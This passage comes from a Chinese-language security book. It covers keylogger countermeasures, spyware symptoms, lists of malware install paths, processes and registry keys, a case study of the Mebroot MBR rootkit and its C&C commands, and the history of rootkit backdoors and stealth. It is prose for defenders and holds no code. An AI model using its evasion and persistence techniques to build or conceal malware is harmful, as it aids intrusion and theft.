2008的64位版本实施内核模式设备驱动程序的强制数字签名,从而限制了键盘记录Rootkit的安装。这种方法要求所有内核模式代码具有自己的数字签名。对于更新的为Vista和之后的系统开发的Windows组件也有同样的要求。这种方法将证明已安装的软件是合法的,来源于确定的出处或者应用程序发行者。这个过程在Microsoft Windows的早期版本和基于Unix的操作系统的早期版本中都不存在。 除非所有内核模式的软件、设备驱动程序、受保护的驱动程序,以及发送任何活动受保护内容的驱动程序都受到Windows的代码完整性功能的保护,否则上述的代码签名类型就无法存在。这种代码完整性功能是Microsoft为确保用户能够在管理员查阅系统日志识别系统错误时提供帮助的最新措施。你可以访问Microsoft的网站(http://www.microsoft.com)了解这一代码完整性功能的更多细节。 程序监控(program monitoring) 你应该经常审核安装在计算机上的应用程序。如果定时进行这种审核,你应该能够很容易地发现悄悄地自行安装在你的计算机上的新程序——这些程序和间谍软件、广告软件有关,或者就是个恶意的安装。 用反间谍(Anti-Spyware)程序进行检测 大部分反间谍程序试图检测活动的击键记录程序并且尽可能地清除这些程序。你一般只能通过更可靠的反间谍程序供应商得到这种级别的支持,而不知名的供应商实际上往往可能支持一些间谍软件供应商。 防火墙 这些应用程序保护你的计算机避免未经许可的入站和出站通信,尽管防火墙很擅长这方面的工作,但是键盘记录程序仍会试图完成其工作——记录计算机的输入。但是,如果键盘记录程序试图将收集的数据发送给犯罪分子,而你的防火墙被配置为阻止所有的出站通信或者对所有的出站连接尝试提出警告,你的系统将更有可能避免键盘记录程序传送所捕捉的输入。 网络入侵检测/预防系统(NIDS/NIPS) 这些系统能够对所有解除你的企业范围内网络设备的任何网络通信提出警告。NIDS会清晰地识别试图建立入站和出站网络连接的未加密键盘记录程序信息传输。如果这些传输被加密,NIDS可能很难将这种网络活动识别为确定的键盘记录程序通信,而只会看到一个未知连接的警告。不管IDS/IPS系统是基于网络或者主机的,都应该对试图发送自身信息的出站连接(phone home行为)提出警告。 智能卡 因为智能卡上的集成电路,使得它们不会受到键盘记录程序和其他记录行为的影响。智能卡可以处理信息并且在你每次登录时返回一个唯一的口令。你一般不能用相同的信息再次登录。这种方法为安全系统增加了更多的验证因素,使恶意程序更加难以作为有效用户验证。利用加密系统,每当你登录时,系统模拟我们稍候将要讨论的一种强有力的加密过程(称为三因素身份认证)。除非你能够破解这种算法(这几乎不可能),否则这种方法几乎不会被破坏。 反键盘记录程序 也可以使用键盘记录程序发现软件,这种软件使用一组“特征码”和所有已知键盘记录程序的列表,能够删除这些键盘记录程序。PC的合法用户能够根据这个列表随时进行扫描,在硬盘上查找目录中的项目。这种保护的缺点是,它只能根据基于特征码的键盘记录程序列表进行保护,而对列表之外的其他键盘记录程序来说PC仍然是脆弱的。 还有许多本章中没有介绍的对抗键盘记录程序的概念性方法。但是,我们已经尝试列出了在我们的教程中遇到的安全操作程序中最常用的方法。 2.1.7 恶意软件的表现 间谍程序很少在一台计算机上独立存在:受到感染的机器可能很快地受到许多其他组件的感染。用户常常会注意到不希望出现的行为和系统性能的下降。间谍软件的感染可能造成不希望出现的CPU占用率、永久的磁盘占用,以及不希望出现的网络流量,所有这些都降低电脑的速度。像应用程序或者系统范围内的崩溃这样的稳定性和性能问题也常随着间谍程序而出现。间谍软件一般会干扰网络软件,使其难以连接到互联网。 有些间谍软件的感染甚至不被用户所察觉。用户以为这些情况是由硬件、Windows安装问题或者病毒引起的。有些严重感染的系统的拥有者联络技术支持专家,甚至因为现有系统“变得太慢”而购买一台新的计算机。严重感染的系统可能需要所有软件的一次干净的重新安装,才能恢复全部功能。单独一个软件很少使一台电脑不可用,除非它分布到更多的系统服务中。 有些其他类型的间谍软件(例如Targetsoft)修改系统文件,这使得它们更难以删除。Targetsoft修改Windows Winsock套接字文件。删除受到间谍软件感染的inetadpt.dll文件将中断正常的网络使用。和许多其他操作系统的用户不同,为了易用性,典型的Windows用户具有管理特权。因为这种特性,用户(故意或者无意)运行的任何程序也就具有无限的系统访问权。间谍软件和其他威胁已经导致一些Windows用户迁移到其他平台(如Linux或者Apple Macintosh),这些平台较不容易受到恶意软件的感染。这归功于这些操作系统默认情况下不允许程序进行任何深入操作系统内部的无限制访问。和其他操作系统一样,Windows用户可以遵循最少权限原则并使用非管理员最少用户访问账户,或者减少脆弱的特殊面向Internet进程(如Internet Explorer)的特权。但是,因为这不是默认或者“预设”的配置,很少有用户这么做。 广告 许多间谍软件利用弹出式广告感染受害者。有些程序仅仅定时显示弹出广告,例如,一些弹出式广告每过几分钟或者在用户打开新的浏览器窗口时显示弹出广告,有些间谍软件在一定的时间内打开好几十个广告。其他一些程序则在用户访问特定网站时显示广告,这和针对性的广告很类似。间谍软件的运作者根据广告商的要求提供这种功能,广告商可以购买广告位置,当用户访问特殊网站时在弹出式广告中显示特定的消费品。这也是间谍程序收集用户行为习惯和浏览习惯的原因之一。 许多用户抱怨恼人或者具有攻击性的广告。和无数的横幅广告一样,许多间谍软件广告使用动画或者闪烁的横幅,这会在视觉上打扰并且激怒用户,很多时候甚至使网络浏览都变得令人难以忍受。弹出式的色情广告的显示往往没有规律并且出现在最糟糕的时候(当你的太太为你送咖啡的时候)。到这些网站的链接可能被加到浏览器窗口、历史记录或者搜索功能中,这可能被你的家庭成员或者雇员看到。许多间谍程序违反法律,比如Zlob和Trojan-Downloader.Win32.INService的变种因其显示违反儿童色情作品法的儿童色情网站而臭名昭著。这一变种还因违反版权法的弹出式序列号生成器、破解以及非法软件弹出广告而闻名。 对有些间谍程序来说还有另一个问题,与查看过的网站上的横幅广告的替代有关。在某些情况下,一些间谍程序被专门创建为浏览器助手对象(Browser Helper Objects,BHO),以便在SSL或者HTTPS连接期间记录用户交互(击键,浏览的页面等)。通过这种基于间谍软件的BHO,犯罪分子可以直接访问你使用Internet Explorer时所做的任何事情。这些BHO所记录的内容也可以发送到互联网上的任何位置以供选择和分析,这将导致某种形式的身份盗用以及/或者对受害人的诈骗。 使用BHO API的间谍软件能够用犯罪分子为其他广告商建立的广告代替网站本身的合法广告(网站的资金来源)的引用,这为间谍软件运作者筹集资金。这种做法不仅侵犯了利用广告筹款的网站的利润,而且还可能用于引入一些似乎清白的广告,这些广告最终被导向下载恶意网站。 广告软件/间谍软件与Cookie 反间谍软件和广告软件常常报告Web广告的HTTP cookie——跟踪浏览活动的小文本文件,它本身不在间谍软件之中,但是常常被间谍软件用来在身份盗用之前获取关于受害人的更多信息。但是cookie并不是天生有害的,许多第三方cookie的用户对象将个人计算机上的空间用于其(第三方)商业用途,并且许多反间谍软件会主动删除cookie。不过,恶意软件也能将自己的cookie写入主机硬盘,以便跟踪用户浏览活动,这些跟踪记录之后可以用于身份盗用和/或引导弹出针对性的广告。cookie一般是无害的并且有助于用户的浏览体验,但是当它们被用于支持犯罪活动时,就从对用户的帮助走向了妨害。cookie能够跟踪许多互联网浏览活动: ·用户查看的广告;这种方法可以用于确定用户不会两次观看同一广告。 ·用户访问的网站,这可以识别用户感兴趣的网站,以便更多地了解个人或者组织。 ·输入网站表单的用户个人信息记录。经过一段时间,就能够收集到足以建立受害人的大规模档案的个人信息,用以盗用他的身份。 广告软件/间谍软件实例 下面是一些使用cookie记录受害人浏览习惯信息的间谍软件实例。广告软件和间谍软件按照功能可以分为下面几类: ·AdwareWebsearch 这类软件添加到受害者的IE工具栏中,监视受害者所浏览的网站,并且显示其广告伙伴公司的广告。 ·CoolWebSearch 这种软件具有几十个变种,是现在人们最担心遇见的软件类型。它不仅将计算机从受害人所喜爱的网站中进行重定向,而且最终通常落到它的一个广告相关网站,将你的计算机带到一个零售、电子、赌博或者各种随机的网站,实现的方法是改写受害者的主DNS文件,将DNS查询引导到更快查找到这些相关网站的网络上。 ·Gator 尽管我好几年没有看到这种工具了,但是因为Gator提供给我们的概念和教训,它还是值得一提的。这种广告程序用于以相关伙伴的横幅代替某些网页上的广告。Gator后来卖给了Claria公司,这个公司将Gator的原始模型改成了几个较小的应用程序。 ·Zlob 有段时间这是臭名昭著的特洛伊木马,因为它不仅重定向你的浏览器到多个IT网站,而且在受害者的计算机上下载并且悄悄地安装和执行恶意应用程序。 2.2 识别安装的恶意软件 作为例子,我们来看看恶意软件一般在哪些位置安装和运行,以试图避免受害者发现它的存在。最重要的是,我们将要评估这些恶意软件选择藏身之所的原因,以及对受害者计算机的影响。但是要记住,这只是发现恶意病毒的常见位置的实例,每天新的恶意软件变种都会改进并且常常改变,以便避开检测和删除。 2.2.1 典型安装位置 几乎所有恶意软件都将安装在相似的目录中,以便在整个受害者计算机上运行和传播。下面是恶意软件较常见的安装目录。 Windows操作系统 下面是Microsoft Windows(多种版本)上找到的恶意软件典型安装位置: ·ApplicationData%\Microsoft\ ·%System%\[FileName].dll ·%Program Files%\Internet Explorer\[FileName].dll ·%Program Files%\Movie Maker\[FileName].dll ·%All Users Application Data%\[FileName].dll ·%Temp%\[FileName].dll ·%System%\[FileName].tmp ·%Temp%\[FileName].tmp Unix/Linux操作系统 下面是Unix/Linux(多种构造版本)上找到的恶意软件典型安装位置: ·/bin/login ·/bin/.login ·/bin/ps ·/etc/ ·/etc/rc.d/ ·/tmp/ ·/usr/bin/.ps ·/usr/lib/ ·/usr/sbin/ ·/usr/spool/ ·/usr/scr/ p>2.2.2 在本地磁盘上安装 恶意软件一般试图安装在主机上容易访问的每个磁盘上,这可能是系统具有写入权限的本地或者映射的网络共享磁盘。恶意软件将安装在系统分区上前面列出的路径,或者任何可用的辅助分区上令人迷惑的文件位置上。 2.2.3 修改时间戳 恶意软件几乎总是会修改它的时间戳,使人不会在第一眼就认出来。 Windows或者Unix/Linux操作系统 时间戳是通用的文件属性,恶意软件在各种操作系统上的操作也相同,所选择的日期与受害计算机上的以下日期相同: ·系统安装日期 ·系统文件日期 ·即时选择的日期 2.2.4 感染进程 几乎所有恶意软件都会试图与系统和用户进程挂钩,以便在幕后进行操作,避免受害者很快地发现它的活动。 Windows操作系统 以下是Microsoft Windows(多个版本)上找到的受恶意软件感染的典型系统和用户进程: ·explorer.exe ·services.exe ·svchost.exe Unix/Linux操作系统 以下是在Unix/Linux(多个构造版本)操作系统上被修改的一些常用进程: ·apached ·ftpd ·rpc.statd ·lpd ·syncscan ·update 2.2.5 禁用服务 恶意软件一般会试图禁用某些操作系统功能,以便继续运行和传播。 Windows操作系统 下面是恶意软件在Microsoft Windows(多个版本)上试图禁用的典型功能: ·Windows自动更新服务(wuauserv) ·后台智能传输服务(BITS) ·Windows安全中心服务(wscsvc) ·Windows Defender服务(WinDefend) ·Windows错误报告服务(ERSvc) ·ERSvc错误报告服务(WerSvc) Unix/Linux操作系统 下面是Unix/Linux操作系统(多个构造版本)上被修改的常用服务: ·apached ·ftpd ·rpc.statd ·lpd ·zssld 2.2.6 修改Windows注册表 下面是一些恶意软件为了运行和传播而修改的最常用的注册表项目: ·HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ ·HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ ·HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ ·HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ 2.3 小结 当今的恶意软件和间谍软件几乎能做任何事情——针对单个或者多个主机,甚至针对一个企业中没有直接组网的计算机。如果恶意软件窃取了你的身份信息并且用于其他目的,将会给公司和个人带来不同程度的危害。你必须知道恶意软件的威胁以及目标和意图,以便更好地对抗其活动。对恶意软件所做的工作及其可能的表现有更好的理解,你所拥有的保护网络不受感染的能力就会增强。请将这些信息作为今后经常性的学习的出发点,以便理解和对抗最新的变种及其方法、意图和功能。 本书由“ePUBw.COM”整理,ePUBw.COM 提供最新最全的优质电子书下载!!! 第二部分 Rootkit 案例研究:不可见的Rootkit偷走了你的银行账户数据 2008年1月,出现了一种新型的Rootkit,通过在计算机上安装击键记录程序,并且在用户输入多家欧洲银行的用户名和密码时进行监控窃取财物数据。这种新的Rootkit是目前所见的最具恶意性的,所有防Rootkit和防恶意工具(包括McAfee、Symantec甚至Kaspersky)都无法发现它,这个Rootkit下载记录计算机中所有击键的恶意软件。 2007年12月12日到2008年1月7日之间,Versign下属的安全公司iDefense发现在欧洲有将近5000台计算机受到感染。一旦安装了这个Rootkit,它就会嵌入到计算机的主引导记录(MBR)。MBR是计算机主硬盘的头512字节。计算机的BIOS通知CPU执行这512字节中的机器码。这段机器码通常被称为自举管理程序(boot manager),一般启动计算机上的操作系统并且引导其访问系统的第一个可用分区。 如果操作系统允许改写硬盘的头512字节,自举管理程序就可以被其他代码替换。Microsoft Windows允许由管理用户执行的应用程序覆盖MBR。当用户访问有意传播病毒的网站(如各种色情和非法软件(warez)网站)时,就会自行感染。这个名为Mebroot的Rootkit利用运行有漏洞的Internet Explorer的用户,一旦利用成功,Rootkit下载一个450KB(相当大)的文件,运行这个文件会将自身存储在硬盘的最后几个扇区中,并且将一个Rootkit的自举管理程序副本写入到MBR中,执行Rootkit本身。 因为这个Rootkit写入到MBR,当系统重新启动时,这个Rootkit将先于操作系统运行,从而确保它首先装入,可以重新感染计算机。 更糟糕的是,F-secure和Symantec的研究人员已经证明这个Rootkit在2007年11月进行了β测试以确保其正常工作。寻找到的Rootkit可执行文件的日期和时间戳表明,在2007年11月,互联网上的一个特殊域开始散布Mebroot的早期版本。在β版本发布之后,又掀起了两次高潮,每次都有一些令人惊异的功能面世。 除了成为第一种感染MBR的Rootkit以外,Mebroot还是专业Rootkit开发的一个顶峰。用于执行进程、隐藏网络流量和躲避检测的方法都很先进,在本书写作的时候仍然能很有效地避开检测。Mebroot在3个主要的领域中进行了革新:隐蔽式的磁盘访问、绕开防火墙、后门通信。这些功能都在Microsoft Windows内核中实现,也就是操作系统通常为管理网卡或者显示卡的驱动程序保留的部分。在内核级别上实现这些功能所需要的技巧非常高,对于一个传统的Rootkit开发人员,只是从其他制作者和网站上复制代码后稍作修改而成的Rootkit更是了不起。 磁盘访问 传统的Rootkit通过拦截应用程序执行的CreateFile()等函数来防止对硬盘的访问。Mebroot则不同。仅仅覆盖内存中的DISK.SYS驱动程序的某些部分来拦截函数调用容易被检测到,而Mebroot覆盖DISK.SYS驱动程序中的所有函数并且安装一个封装驱动程序来调用DISK.SYS,确保行为检测产品(例如基于主机的入侵防御系统)不会阻止它感染DISK.SYS。 作为进一步的措施,这个Rootkit还启动一个“看门狗”线程,每过几秒就进行检查,确保该Rootkit的隐身功能仍然安装在系统上,如果该功能被移除,则重新安装。 绕开防火墙 Rootkit需要使它们和协同工作的任何恶意软件悄悄访问网络,以请求网页并与其指挥控制(C&C)服务器通信。当然,如果Rootkit不隐藏其通信,防Rootkit工具(如防火墙和主机入侵防御系统(HIPS))可能会发现它。 在Mebroot之前,大部分Rootkit只是创建和安装一个与Windows内核的网络接口NDIS中相似的网卡驱动程序。Mebroot不希望被发现,所以开发人员不使用以上的方法,而是编写一组算法来查找Microsoft的NDIS中隐藏的和文档中未出现的函数,这使Rootkit可以与NDIS通信而不需要安装驱动程序。这种方法虽然隐蔽性很好,但是要求Rootkit实现自己的TCP/IP协议栈来与互联网上的其他设备通信。编写自己的TCP/IP协议栈很困难,这说明了Rootkit创作者为了不被发现,在开发期间所投入的专注力。 后门通信 Mebroot采用了先进的防火墙绕开技术来秘密地与互联网上的指挥控制服务器通信并处理来自僵尸网络所有者的命令。但是研究人员只发现了一个Rootkit能够翻译的命令(INST命令,安装各种恶意软件)。 首先,Rootkit连接到一个随机的指挥控制服务器,使用当前时间和日期以及多种硬编码域建立一个域名。一旦Rootkit将一个DNS名称解析为IP地址,就会发送一个加密的封包给这个IP地址以“ping”这个指挥控制服务器,确定它响应加密通信。这个Rootkit使用基于SHA-1的加密算法,这种算法是业界标准,但是使用很弱和容易解密的密钥,研究人员能够解密封包。为了增加复杂度,解密的封包实际上包含了使用其他恶意软件中的不同加密方案加密的数据。 指挥控制服务器响应Rootkit之后,能够通知Rootkit执行以下4个命令之一: ·将一个DLL安装到任何进程中或者安装新版本的Mebroot。 ·卸载一个用户模式的DLL或者Mebroot。 ·命令一个可信的进程根据文件名启动新的进程。 ·执行内核模式下的任何驱动程序。 卸载Rootkit的功能进一步证明,这个Rootkit是由专家开发和测试的,因为卸载功能在调试和创建Rootkit时都有用。 接收到命令时,Rootkit将使用非常详细的指令(对于这个案例来说太详细了!)在系统上执行每个命令,确保防Rootkit技术不会阻止命令的执行。例如,Rootkit使用内建的系统调用(与操作系统做的相似!)来重写在系统上执行的自定义DLL。 意图 是什么样的利益驱使Mebroot的开发者愿意花费可能长达数月的时间开发这么高级的Rootkit?是金钱。Mebroot安装和执行指挥控制服务器分发的恶意软件来感染主机。这个恶意软件能够记录击键,嗅探HTTP和HTTPS请求,并且在网站特别是银行网站注入任意的HTML。这些特性使其能够进行许多不同类型的欺诈,包括身份盗窃、单击欺诈和银行账户盗窃。 在本书写作时,新的Mebroot浪潮已经出现,使用了更加有创意的隐藏技术。 Mebroot是公众所见的最高级的Rootkit,由专家编写,高效而且难以移除,这个Rootkit分发恶意软件,用于窃取像银行账户和信用卡号码这样的财务信息。Mebroot具备的所有高级功能只是Rootkit革新的开始,这一革新将把曾经很容易清除或者低效的恶意软件能力推进到一个新的水平。 现在,并不是说一切都完了。Mebroot可以删除,最简单的删除方法就是从Windows恢复控制台上运行fixmbr命令,这可以通过Windows XP CD(包含在所有Windows安装中)启动。这个命令用标准的Windows MBR覆盖Rootkit的MBR入口。最新的BIOS的某些设置也能使你的MBR成为只读。如果设置为只读,任何对MBR的修改都会导致BIOS警告。 第3章 用户模式Rootkit Rootkit及其功能随着时间的推移已经改变。地下组织非常快地采用这些应用程序的功能,这有助于理解Rootkit的来源,它们适应环境的原因,以及未来攻击者将会利用它们来做什么。 第一个Rootkit的前辈实际上根本不是Rootkit,只是一组从机器上删除入侵证据的应用程序。早在1989年就在被黑客攻击的系统上发现了所谓的日志清除工具套件,该套件帮助攻击者在破坏一个又一个系统时掩盖痕迹。这些自动化的应用程序将在攻击者得到服务器管理权限后尽快执行,找出各种存储了登录用户以及用户所执行命令的日志文件。找到这些文件后,打开它们并且有策略地删除某些日志或者删除整个文件。 虽然日志清除程序帮助掩盖了对系统的第一次访问,但是攻击者希望始终避免系统管理员发现他们曾经登录过公司的服务器。这种需求导致了第一代Rootkit的出现。第一代Rootkit服务于一个主要的目的——执行使攻击者不会被发现的命令。传统上说,攻击由攻击者利用有漏洞的网络服务(例如inetd-Unix用来将网络套接字连接到应用程序的应用)、清除日志和在系统上添加新用户使攻击者能再次访问系统组成。这种后门账户现在仍然是常见的,因为攻击者希望维护对系统的访问权。 添加一个新用户的问题在于可能会被管理员发现。为了避免这种情况,第一代Rootkit包含了日志清除程序以及Unix常用的命令行工具(例如列出文件目录的ls和列出系统上运行程序的ps)的新版本。这些新版本从工具的输出中删除了新创建的后门用户的文件和进程。 3.1 维持访问权 维持对被破解的系统的访问权对于攻击者来说是很重要的。具备了重新以完整的管理权限登录到服务器上的能力,攻击者就能利用服务器来进行其他攻击、存储数据或者寄生一个恶意的网站。Rootkit通过安装本地或者远程后门来维持访问权。本地后门是一个应用程序,运行后将会给予普通用户完全的管理权限。本地后门在早期Rootkit开发中很常见,因为许多系统的攻击者是试图提升权限的普通用户。而且,攻击者希望保留一个本地后门作为本地后门用户账户的补充,以防远程后门失效。 远程后门一般是最佳的方法。早期的Rootkit具有多种远程后门。Rootkit中后门的隐蔽性和成熟程度是区分各种Rootkit的标准。远程后门一般分为3种:网络套接字监听程序、特洛伊木马或者隐蔽信道。 基于网络的后门 多年以来Rootkit使用了多种基于网络的后门,有些现在仍然被广泛使用。标准的基于网络的后门是在系统的高端口上使用telnet或者运行一个shell程序。例如,攻击者修改inetd,这样在用户连接到31337端口时会打开一个命令shell。这种后门可以追溯到20世纪80年代,在20世纪90年代也使用过。攻击者使用了TCP、UDP甚至ICMP,但是UDP和ICMP可靠性差得多,一般不能很好地工作。后门使用的通信流一般是普通文本,但是较晚的版本开始使用加密,以便在所连接的机器或者网络上放置了嗅探程序时可以隐藏通信。 这些基于网络的后门的问题是,很容易被所在系统上的端口扫描或者使用一个阻止除了接受服务的真正客户之外所有入站端口的防火墙发现。这些后门很少进行身份认证或者用户登录验证,所以有些攻击者扫描互联网寻找他们能简单访问的后门,并且从其他攻击者那里接管这个后门。 作为大部分攻击者的最后手段,另一种基于网络的Rootkit完全不在网络上运行,但是可以通过被破解的系统的Web服务器访问。这些公共网关接口(CGI)脚本将被安装在Web服务器的一个目录上,并且执行用户定义的命令,在浏览器中显示输出。本地后门可以用于与这个脚本一起重新得到机器的控制权,以防管理员删除账户或者基于网络的后门应用程序。 时光流转,我们进入了21世纪,Windows成为Rootkit开发者的主要焦点,攻击者开始利用Back Orifice这样的后门来保持对Windows设备的远程访问权。Back Orifice发布于1999年末,提供了插件架构,这些插件使攻击者能够远程地看到运行Back Orifice的机器的屏幕、键盘输入,并且可以安装软件,查看存储的密码,运行任何程序。Back Orifice主要使用TCP作为通信协议,而且可以配置。Back Orifice发布后,它所提供的功能被采用并且集成到许多其他Windows环境的恶意软件和Rootkit中。 3.2 隐身:掩盖存在 Rootkit的第二种主要特性是可以隐藏它们在系统上存在的任何证据。我们已经提到过,Rootkit从攻击者用于删除他们所闯入的系统上的日志的程序演变而来。由于Rootkit开始转变为提供对系统持续的“根”访问权的程序,因此Rootkit运作所必需的所有文件或者注册表键值就变得非常重要了。如果隐藏了本书提到的这些项目,系统管理员和防Rootkit工具将非常难以发现Rootkit。大部分Rootkit将会隐藏它们所生成的文件、Rootkit用户指定的文件以及Rootkit所生成的所有网络连接。所要隐藏的内容通常在一个配置文件中指定或者硬编码于Rootkit自身之上。 最新一代的Rootkit使用其隐身能力帮助其他恶意软件(如窃取用户名、密码和银行账户信息的程序)躲避用户和防恶意软件工具。恶意软件和Rootkit的结盟促使Rootkit开发者显著地改进了隐身技术的质量和有效性。当Rootkit在Unix环境中第一次被发现时,它们一般只能使用一种方法来实现自己的隐身能力。例如,它们在ls工具使用时过滤文件,但是当一个定制工具从文件系统读取文件时就无法过滤。最新的Windows Rootkit(例如Rustock.C)所使用的Rootkit,能够使用多种方法确保没有遗漏。这些方法将在第4章和第10章中讨论。 隐身是所有Rootkit的主要部件,本书将用大量的篇幅对Rootkit开发者用于实现其隐身能力的概念和技术加以阐述。为什么隐身对于我们来说这么重要?这只是因为大部分Rootkit检测工具利用隐身功能对系统的改变来发现Rootkit! 3.3 Rootkit的类型 Rootkit一般有两种类型:用户模式和内核模式。用户模式Rootkit运行于系统上一个用户的环境和安全上下文中。例如,如果你以用户bwilson登录工作站,这个用户没有管理特权,那么Rootkit将进行过滤,将后门访问权赋予所有bwilson账户下运行的应用程序。一般来说,大部分用户账户也拥有管理特权,所以用户模式的Rootkit也能够防止系统级别的进程(如Windows服务)受到隐身功能的影响。 尽管本书主要关注Windows恶意软件和Rootkit,但在Unix界也有一种类型的Rootkit和用户模式的Rootkit很相似,这种Rootkit常常被称为程序库Rootkit,它们过滤应用程序对各种共享系统库的调用。因为这种Rootkit没有直接与具体的用户名关联,所以可能比标准的用户模式Rootkit更高效,但是不像内核模式Rootkit那么高效或者难以删除。 内核模式Rootkit在操作系统内部与硬件(如显示卡、网卡或者鼠标)驱动程序的相同级别中运行。编写一个用于操作系统内核中的Rootkit要比用户模式Rootkit难得多,需要攻击者具备很高的技巧。而且,由于大部分操作系统因为更新和新的版本而改变内核的一些部分,所以内核Rootkit不能工作于所有版本的Windows。因为Rootkit的运作像驱动程序一样在内核进行,所以它就具备了增加操作系统不稳定性的能力。通常,这是大部分人发现系统上运行着Rootkit的原因,因为他们注意到系统速度减慢、出现蓝屏或者导致系统重新启动的其他错误。 3.4 时间轴 Rootkit随着时间的推移而发展。从一组帮助维持对一台机器的访问权的工具集开始,它们已经演变成了邪恶的应用程序,能够隐藏自身和其他文件,难以删除并且帮助其他恶意软件。下面是一个简单的时间轴,帮助你了解Rootkit的演变: ·20世纪80年代末 发现第一个日志清除程序。 ·1994年 发现第一个SunOS Rootkit。 ·1996年 第一个Linux Rootkit出现。 ·1997年 《Phrack》杂志中提到了基于可装入内核模块的Rootkit。 ·1998年 Silvio Cesare发布第一个非可装入内核模块的内核补丁Rootkit代码。全功能的Windows后门Back Ofifice发布。 ·1999年 Greg Hoglund发布第一种Windows Rootkit——NT Rootkit。 ·2000年 t0rnkit libproc Rootkit/特洛伊木马发布。 ·2002年 Rootkit中出现Sniffer后门。Hacker Defender发布,成为最常使用的Windows Rootkit之一。 ·2004年 Unix中的大多数Rootkit开发停止,焦点转移到Windows。FU Rootkit发布并引入一种新的隐藏进程的技术。 ·2005年 Sony BMG发生Rootkit丑闻。第一次将Rootkit技术用于商业。 ·2006年 Rootkit成为几乎每个主要的蠕虫和病毒的一部分。开始开发虚拟Rootkit。 ·2008年 在没有新技术出现的两年之后,Rootkit开始利用自举进程自行安装,代码改编自eEye Bootroot Rootkit。 3.5 用户模式Rootkit 本章的余下部分将讨论几种类型的用户模式Rootkit,定义、解释功能,然后提供不同Rootkit的实例和对策。本书将Rootkit定义为“能够长时间存在于计算机上或者自动化信息系统上的未被发现的程序和代码集合”。和其他软件(如利用程序或者恶意软件)不同,Rootkit一般在系统重新启动后仍然持续起作用。 为什么这个定义很重要?这个定义指出了Rootkit和其他类型软件(如特洛伊木马、病毒或者应用程序)的关键差异。例如,在定义中去掉“未被发现”这个词将变成系统管理软件包或者远程管理软件的定义。但是,这个软件未被发现并且提供和系统的固定联系暗示着该软件提供了一个便于未来访问的后门。Rootkit还有意地通过安全界中传统的和可接受的方法编写来避免被发现。要注意一点,过去的许多病毒和木马因为其主要的功能而无法隐身。 因为Rootkit的设计目标是成为无法检测的软件,所以将会试图保持隐蔽并且掩盖其功能,以避免被防Rootkit工具发现。大部分Windows Rootkit将会试图隐藏驱动程序、可执行文件(.exe和.dll)和系统文件(.sys)、端口和服务器连接、注册表键值、服务,可能还有其他类型的代码(如后门、击键记录程序、特洛伊木马和病毒)。对于获取系统的根访问权并且处于隐蔽位置的软件包的影响,全世界的系统管理员和网络防御人员都非常担心。许多当今的Rootkit的焦点已经与恶意软件一致,用来隐藏恶意软件的远程指挥控制功能。恶意软件需要远程访问被感染的工作站,而Rootkit提供隐身性使恶意软件的运行不被发现。 很重要的一点是,本书将把未被发现和隐藏这两个词语互换使用。但是,没有一个Rootkit是永远无法探测或者真正隐藏的。每个Rootkit都可以探测到,但是传统的应用程序或者技术在默认情况下可能无法找到所有的Rootkit。而且,准确探测Rootkit要求的难度和时间可能超出了结果的价值。 除了隐身以外,Rootkit一般和提升非根用户到根级别特权相关联。这个功能多半与Unix Rootkit而非Windows Rootkit相关,因为大部分Windows用户以管理(根)级别用户的身份运行。虽然Rootkit最初的目标(也是其名字的由来)是提升权限,但是现在对于攻击者来说,保持不被发现和确保控制被感染机器更加有利可图。 还有一点需要指出,Rootkit一般可以是在磁盘上存储或者基于内存的。持续性的Rootkit将保留在系统磁盘上,在每次系统启动时装入。这要求代码被配置为无人值守装入和运行(这可能导致Rootkit被一些更常用的探测方法发现)。持续性的Rootkit代码保存在非易失的位置上,如文件系统或者注册表。基于内存的Rootkit纯粹在内存中运行,在系统启动后丢失,这在运行中的系统上更加难以发现。 本书稍后的几章将讨论几种类型的Rootkit,包括内核模式、虚拟、数据库和硬件Rootkit,我们将从用户模式Rootkit开始。 3.5.1 什么是用户模式Rootkit 我们已经建立了Rootkit的通用定义,可以进一步定义来包含更多的Rootkit类型。我们将用户模式的Rootkit定义为“能够长时间存在于计算机上或者自动化信息系统上的未被发现的处于用户空间(userland)的用户程序和代码集合”。从本书的意图出发,用户空间的定义为“不属于内核并由特权分离(privilege separation)保护的应用程序空间”。实际上,所有用户模式应用程序在用户账户特权级别上运行于系统之中,不是操作系统的一部分。例如,如果你以bwilson用户身份登录Windows工作站,用户模式Rootkit将以用户bwilson的身份进行操作。所有权限和策略(如拒绝策略或者权限)仍然有效,这将会限制Rootkit所能访问的对象。尽管用户一般被视为最低权限并且对文件和目录的访问权受到削减,但是在当今的家庭和公司环境中大部分工作站的用户以本地工作站的管理用户身份运行。作为本地工作站的管理用户,用户Rootkit得到了本地工作站上的完全控制权。 为了便于解释,本章中讨论的用户模式Rootkit都是Windows Rootkit。尽管*nix和Windows系统中的功能性极其相似,但是在过去的10年中Windows Rootkit的变种分布要广得多。尽管用户模式Rootkit的开发无论怎么说都不简单,但是对于Windows平台来说比*nix要更容易创建和散布。 操作系统的流行性、可用的免费源代码数量以及官方支持的钩子机制文档的数量使得Windows中的用户模式Rootkit的开发变得简单。这有多简单?可是,即使开发这么容易,攻击者仍然觉得下载源代码和编译所需要的时间和精力太多,因此通用而高效的用户模式Rootkit-Hacker Defender可以花费大约500美元购买到。如果你希望定制自己的Rootkit,Hacker Defender和其他用户模式的Rootkit源代码可以公开下载。开放源代码的Rootkit已经变得更加普遍,所以没有经验的攻击者就更加容易上手了。 从建立一个用户模式Rootkit到在Windows上部署之间的时间很短,这推动了恶意软件的散布,这些恶意软件要求用户模式Rootkit将它们隐藏起来,在Windows任务管理器、注册表和文件系统中难以发现。用户模式Rootkit被广泛采用并且开始成为普遍现象,因此安全界采用了相应的技术来探测它们。现在,用户模式Rootkit不是非常有效,相对容易被大部分防病毒产品发现。我们甚至认为用户模式Rootkit是没有用的,但是许多恶意软件仍然采用用户模式Rootkit技术,因此理解Rootkit方法以便持续地发现和分析它们是很重要的。 3.5.2 后台技术 因为Rootkit依赖于隐身状态的实现,所以它必须在用户模式中拦截和枚举应用编程接口(API),并且从任何返回的结果中删除Rootkit。API钩子必须以不可探测的方式实现,以免通知用户或者管理员Rootkit的存在。因为API钩子对于理解用户模式Rootkit的工作方式很关键,所以我们将花一点时间谈谈关于它的内容以及用于与API挂钩的技术。 